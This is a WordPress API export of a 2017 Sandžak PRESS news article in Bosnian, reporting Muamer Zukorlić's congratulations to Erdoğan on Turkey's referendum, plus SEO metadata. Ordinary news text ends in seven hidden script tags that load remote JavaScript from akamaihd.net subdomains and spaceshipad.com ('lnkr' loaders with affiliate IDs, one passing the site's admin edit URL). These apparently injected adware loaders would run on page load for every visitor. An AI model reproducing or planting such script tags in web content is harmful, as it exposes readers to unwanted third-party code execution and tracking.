{"id":185047,"date":"2017-04-19T14:15:50","date_gmt":"2017-04-19T12:15:50","guid":{"rendered":"https:\/\/sandzakpress.net\/arhiva\/?p=185047"},"modified":"2017-04-19T14:17:24","modified_gmt":"2017-04-19T12:17:24","slug":"zukorlic-cestitao-erdoganu-pobjedu-na-referendumu","status":"publish","type":"post","link":"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/","title":{"rendered":"Zukorli\u0107 \u010destitao Erdoganu pobjedu na referendumu"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-185048\" src=\"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/04\/zukorlic-erdogan.jpg\" alt=\"\" width=\"625\" height=\"376\" srcset=\"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/04\/zukorlic-erdogan.jpg 625w, https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/04\/zukorlic-erdogan-616x371.jpg 616w\" sizes=\"(max-width: 625px) 100vw, 625px\" \/><\/p>\n<p><strong>Narodni poslanik i lider BDZ Sand\u017eaka uputio je danas \u010destitku predsjedniku Republike Turske Red\u017eepu Erdoanu povodom pobjede na referendumu. U \u010destitki se ka\u017ee:<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>Uva\u017eeni predsjedni\u010de Erdogan, es-selamu alejkum!<\/p>\n<p>Povodom pobjede na neposredno odr\u017eanom referendumu za ustavne promjene u Republici Turskoj, Vama, bratskim narodima Turske, AK partiji i svim dobronamjernim ljudima u ime Bo\u0161njaka Sand\u017eaka, Bo\u0161nja\u010dke demokratske zajednice i svoje li\u010dno ime upu\u0107ujem srda\u010dne \u010destitke.<\/p>\n<p>Odlu\u010dno\u0161\u0107u na ovom referendumu narodi Turske demonstrirali su demokratsko opredjeljenje i spremnost da vlastitu i sudbinu svoje dr\u017eave stave na prvo mjesto prioriteta i time jo\u0161 jednom dokazali patriotsku odlu\u010dnost da u presudnim trenucima rasu\u0111uju ispravno i sopstvene interese podrede dobrobiti naroda i dr\u017eave.<\/p>\n<p>Bo\u0161njaci u Turskoj su kroz povijest bili konstrutivan faktor, te su dali nesebi\u010dan doprinos ustavnim promjenama.<\/p>\n<p>\u00a0Duboko svjesni \u010dinjenice da se ovim referendumom ja\u010da pozicija Republike Turske i njenog predsjednika u brobi za o\u010duvanje dr\u017eave, ja\u010danje ekonomske pozicije i\u00a0 svekolikog drugog\u00a0 prosperiteta, vjerujemo da, kao ni do sada, bratska briga ne\u0107e zaobi\u0107i ni muslimane \u0161irom svijeta, naro\u010dito Sirije i okolnih zemalja koji danas od Turske o\u010dekuju iskrenu podr\u0161ku i pomo\u0107.<\/p>\n<p>Tako\u0111er, muslimanski narodi Balkana o\u010dekuju da se dosada\u0161na svekolika saradnja sa dr\u017eavama u kojima \u017eive produbi i da zajedno, na bratskim i partnerskim osnovama \u010duvamo na\u0161e ogrmno kulturolo\u0161ko blago i gradimo ambijent u kome \u0107emo se svi zajedno boriti da univerzalne vrijednosti dobra i dobrote osvoje srca cijelog \u010dovje\u010danstva. O\u010dekujemo jo\u0161 \u010dvr\u0161\u0107e odr\u017eavanje i unapre\u0111enje rodbinskih, ekonomskih i svih drugih veza izme\u0111u Bo\u0161njaka na Balkanu i naroda Turske.<\/p>\n<p>Naro\u010dito nam je va\u017eno \u0161to \u0107e ovo opredjeljenje turskih naroda za ustavne promjene zna\u010diti i ve\u0107u stabilnost kako u Republici Turskoj i njenim susjednim teritorijama tako vjerujemo i na \u010ditavome Balkanu i time doprinijeti da se ideja pomirenja i harmoni\u010dnog su\u017eivota svih koji dijele ovaj prostor, a \u0161to i jeste su\u0161tinsko na\u010delo na\u0161e politike,\u00a0 osna\u017ei i dobije bitnu potporu.<\/p>\n<p>U tom duhu, primite mahsuz selame uz molbu Gospodaru svjetova da pomogne i sa\u010duva Republiku Tursku i njene dostojanstvene i slobodarske narode.<\/p>\n<p>Narodni poslanik Bo\u0161nja\u010dke demokratske zajednice u Republici Srbiji Muamer Zukorli\u0107.<\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"http:\/\/asrvvv-a.akamaihd.net\/get?addonname=Not%20set&amp;clientuid=undefined&amp;subID=51172_4402_&amp;affid=9686&amp;subaffid=1001&amp;href=https%3A%2F%2Fsandzakpress.net%2Farhiva%2Fwp-admin%2Fpost.php%3Fpost%3D185047%26action%3Dedit\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/cdncache-a.akamaihd.net\/sub\/nee5452\/51172_4402_\/l.js?pid=2449&amp;ext=Advertise\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/cdncache-a.akamaihd.net\/sub\/nee5452\/51172_4402_\/l.js?pid=2450&amp;ext=Not%20set\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/cdncache-a.akamaihd.net\/sub\/nee5452\/51172_4402_\/l.js?pid=2448&amp;ext=Not%20set\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/spaceshipad.com\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/spaceshipad.com\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/spaceshipad.com\/ext\/1132b2759e429a3254.js?sid=51172_4402_&amp;title=Not%20set&amp;blocks[]=04fcf\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Narodni poslanik i lider BDZ Sand\u017eaka uputio je danas \u010destitku predsjedniku Republike Turske Red\u017eepu Erdoanu povodom pobjede na referendumu. U \u010destitki se ka\u017ee: &nbsp; Uva\u017eeni predsjedni\u010de Erdogan, es-selamu alejkum! Povodom pobjede na neposredno odr\u017eanom referendumu za ustavne promjene u Republici Turskoj, Vama, bratskim narodima Turske, AK partiji i svim dobronamjernim ljudima u ime Bo\u0161njaka Sand\u017eaka, [&hellip;]<\/p>\n","protected":false},"author":509,"featured_media":185048,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[72,1,52,327,392,393,394,8957,2692],"tags":[10204,10223],"class_list":{"0":"post-185047","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-novi-pazar","8":"category-politika","9":"category-sjenica","10":"category-tutin","11":"category-prijepolje_","12":"category-priboj","13":"category-nova-varos","14":"category-vijesti-dana","15":"category-turska-gradovi","16":"tag-muftija-muamer-zukorlic","17":"tag-bdz"},"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v23.1 (Yoast SEO v24.9) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Zukorli\u0107 \u010destitao Erdoganu pobjedu na referendumu<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/\" \/>\n<meta property=\"og:locale\" content=\"bs_BA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Zukorli\u0107 \u010destitao Erdoganu pobjedu na referendumu\" \/>\n<meta property=\"og:description\" content=\"Narodni poslanik i lider BDZ Sand\u017eaka uputio je danas \u010destitku predsjedniku Republike Turske Red\u017eepu Erdoanu povodom pobjede na referendumu. U \u010destitki se ka\u017ee: &nbsp; Uva\u017eeni predsjedni\u010de Erdogan, es-selamu alejkum! Povodom pobjede na neposredno odr\u017eanom referendumu za ustavne promjene u Republici Turskoj, Vama, bratskim narodima Turske, AK partiji i svim dobronamjernim ljudima u ime Bo\u0161njaka Sand\u017eaka, [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/\" \/>\n<meta property=\"og:site_name\" content=\"Sand\u017eak PRESS\" \/>\n<meta property=\"article:published_time\" content=\"2017-04-19T12:15:50+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2017-04-19T12:17:24+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/04\/zukorlic-erdogan.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"625\" \/>\n\t<meta property=\"og:image:height\" content=\"376\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Agencija\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Agencija\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/\"},\"author\":{\"name\":\"Agencija\",\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/cb59d7e3ab91ab90dd680ad0305a6185\"},\"headline\":\"Zukorli\u0107 \u010destitao Erdoganu pobjedu na referendumu\",\"datePublished\":\"2017-04-19T12:15:50+00:00\",\"dateModified\":\"2017-04-19T12:17:24+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/\"},\"wordCount\":401,\"commentCount\":9,\"publisher\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/6e72b67d6e51910a1117b3b483ba20bd\"},\"image\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/04\/zukorlic-erdogan.jpg\",\"keywords\":[\"muftija Muamer Zukorli\u0107\",\"BDZ\"],\"articleSection\":[\"Novi Pazar\",\"Politika\",\"Sjenica\",\"Tutin\",\"Prijepolje\",\"Priboj\",\"Nova Varo\u0161\",\"VIJESTI DANA\",\"Turska\"],\"inLanguage\":\"bs-BA\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/\",\"url\":\"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/\",\"name\":\"Zukorli\u0107 \u010destitao Erdoganu pobjedu na referendumu\",\"isPartOf\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/04\/zukorlic-erdogan.jpg\",\"datePublished\":\"2017-04-19T12:15:50+00:00\",\"dateModified\":\"2017-04-19T12:17:24+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/#breadcrumb\"},\"inLanguage\":\"bs-BA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"bs-BA\",\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/#primaryimage\",\"url\":\"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/04\/zukorlic-erdogan.jpg\",\"contentUrl\":\"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/04\/zukorlic-erdogan.jpg\",\"width\":625,\"height\":376,\"caption\":\"BEOGRAD 06.07.2016 Muamer Zukorlic, bosnjacki politicar, bivsi muftija islamske zajednice u Srbiji RAS\/foto Vesna Lalic\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/sandzakpress.net\/arhiva\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Zukorli\u0107 \u010destitao Erdoganu pobjedu na referendumu\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#website\",\"url\":\"https:\/\/sandzakpress.net\/arhiva\/\",\"name\":\"Sand\u017eak PRESS\",\"description\":\"Prve elektronske novine u Sand\u017eaku\",\"publisher\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/6e72b67d6e51910a1117b3b483ba20bd\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/sandzakpress.net\/arhiva\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"bs-BA\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/6e72b67d6e51910a1117b3b483ba20bd\",\"name\":\"Kul\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"bs-BA\",\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/42263f39aa27ac04c43cab85c280eb2e?s=96&d=mm&r=pg\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/42263f39aa27ac04c43cab85c280eb2e?s=96&d=mm&r=pg\",\"caption\":\"Kul\"},\"logo\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/cb59d7e3ab91ab90dd680ad0305a6185\",\"name\":\"Agencija\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"bs-BA\",\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4b7fafa80a22f0c2afe23966b3961fe0?s=96&d=mm&r=pg\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4b7fafa80a22f0c2afe23966b3961fe0?s=96&d=mm&r=pg\",\"caption\":\"Agencija\"},\"url\":\"https:\/\/sandzakpress.net\/arhiva\/author\/agencija\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Zukorli\u0107 \u010destitao Erdoganu pobjedu na referendumu","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/","og_locale":"bs_BA","og_type":"article","og_title":"Zukorli\u0107 \u010destitao Erdoganu pobjedu na referendumu","og_description":"Narodni poslanik i lider BDZ Sand\u017eaka uputio je danas \u010destitku predsjedniku Republike Turske Red\u017eepu Erdoanu povodom pobjede na referendumu. U \u010destitki se ka\u017ee: &nbsp; Uva\u017eeni predsjedni\u010de Erdogan, es-selamu alejkum! Povodom pobjede na neposredno odr\u017eanom referendumu za ustavne promjene u Republici Turskoj, Vama, bratskim narodima Turske, AK partiji i svim dobronamjernim ljudima u ime Bo\u0161njaka Sand\u017eaka, [&hellip;]","og_url":"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/","og_site_name":"Sand\u017eak PRESS","article_published_time":"2017-04-19T12:15:50+00:00","article_modified_time":"2017-04-19T12:17:24+00:00","og_image":[{"width":625,"height":376,"url":"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/04\/zukorlic-erdogan.jpg","type":"image\/jpeg"}],"author":"Agencija","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Agencija","Est. reading time":"2 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/#article","isPartOf":{"@id":"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/"},"author":{"name":"Agencija","@id":"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/cb59d7e3ab91ab90dd680ad0305a6185"},"headline":"Zukorli\u0107 \u010destitao Erdoganu pobjedu na referendumu","datePublished":"2017-04-19T12:15:50+00:00","dateModified":"2017-04-19T12:17:24+00:00","mainEntityOfPage":{"@id":"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/"},"wordCount":401,"commentCount":9,"publisher":{"@id":"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/6e72b67d6e51910a1117b3b483ba20bd"},"image":{"@id":"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/#primaryimage"},"thumbnailUrl":"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/04\/zukorlic-erdogan.jpg","keywords":["muftija Muamer Zukorli\u0107","BDZ"],"articleSection":["Novi Pazar","Politika","Sjenica","Tutin","Prijepolje","Priboj","Nova Varo\u0161","VIJESTI DANA","Turska"],"inLanguage":"bs-BA","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/","url":"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/","name":"Zukorli\u0107 \u010destitao Erdoganu pobjedu na referendumu","isPartOf":{"@id":"https:\/\/sandzakpress.net\/arhiva\/#website"},"primaryImageOfPage":{"@id":"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/#primaryimage"},"image":{"@id":"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/#primaryimage"},"thumbnailUrl":"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/04\/zukorlic-erdogan.jpg","datePublished":"2017-04-19T12:15:50+00:00","dateModified":"2017-04-19T12:17:24+00:00","breadcrumb":{"@id":"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/#breadcrumb"},"inLanguage":"bs-BA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/"]}]},{"@type":"ImageObject","inLanguage":"bs-BA","@id":"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/#primaryimage","url":"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/04\/zukorlic-erdogan.jpg","contentUrl":"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/04\/zukorlic-erdogan.jpg","width":625,"height":376,"caption":"BEOGRAD 06.07.2016 Muamer Zukorlic, bosnjacki politicar, bivsi muftija islamske zajednice u Srbiji RAS\/foto Vesna Lalic"},{"@type":"BreadcrumbList","@id":"https:\/\/sandzakpress.net\/arhiva\/zukorlic-cestitao-erdoganu-pobjedu-na-referendumu\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/sandzakpress.net\/arhiva\/"},{"@type":"ListItem","position":2,"name":"Zukorli\u0107 \u010destitao Erdoganu pobjedu na referendumu"}]},{"@type":"WebSite","@id":"https:\/\/sandzakpress.net\/arhiva\/#website","url":"https:\/\/sandzakpress.net\/arhiva\/","name":"Sand\u017eak PRESS","description":"Prve elektronske novine u Sand\u017eaku","publisher":{"@id":"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/6e72b67d6e51910a1117b3b483ba20bd"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/sandzakpress.net\/arhiva\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"bs-BA"},{"@type":["Person","Organization"],"@id":"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/6e72b67d6e51910a1117b3b483ba20bd","name":"Kul","image":{"@type":"ImageObject","inLanguage":"bs-BA","@id":"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/42263f39aa27ac04c43cab85c280eb2e?s=96&d=mm&r=pg","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/42263f39aa27ac04c43cab85c280eb2e?s=96&d=mm&r=pg","caption":"Kul"},"logo":{"@id":"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/image\/"}},{"@type":"Person","@id":"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/cb59d7e3ab91ab90dd680ad0305a6185","name":"Agencija","image":{"@type":"ImageObject","inLanguage":"bs-BA","@id":"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4b7fafa80a22f0c2afe23966b3961fe0?s=96&d=mm&r=pg","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4b7fafa80a22f0c2afe23966b3961fe0?s=96&d=mm&r=pg","caption":"Agencija"},"url":"https:\/\/sandzakpress.net\/arhiva\/author\/agencija\/"}]}},"_links":{"self":[{"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/posts\/185047"}],"collection":[{"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/users\/509"}],"replies":[{"embeddable":true,"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/comments?post=185047"}],"version-history":[{"count":0,"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/posts\/185047\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/media\/185048"}],"wp:attachment":[{"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/media?parent=185047"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/categories?post=185047"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/tags?post=185047"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}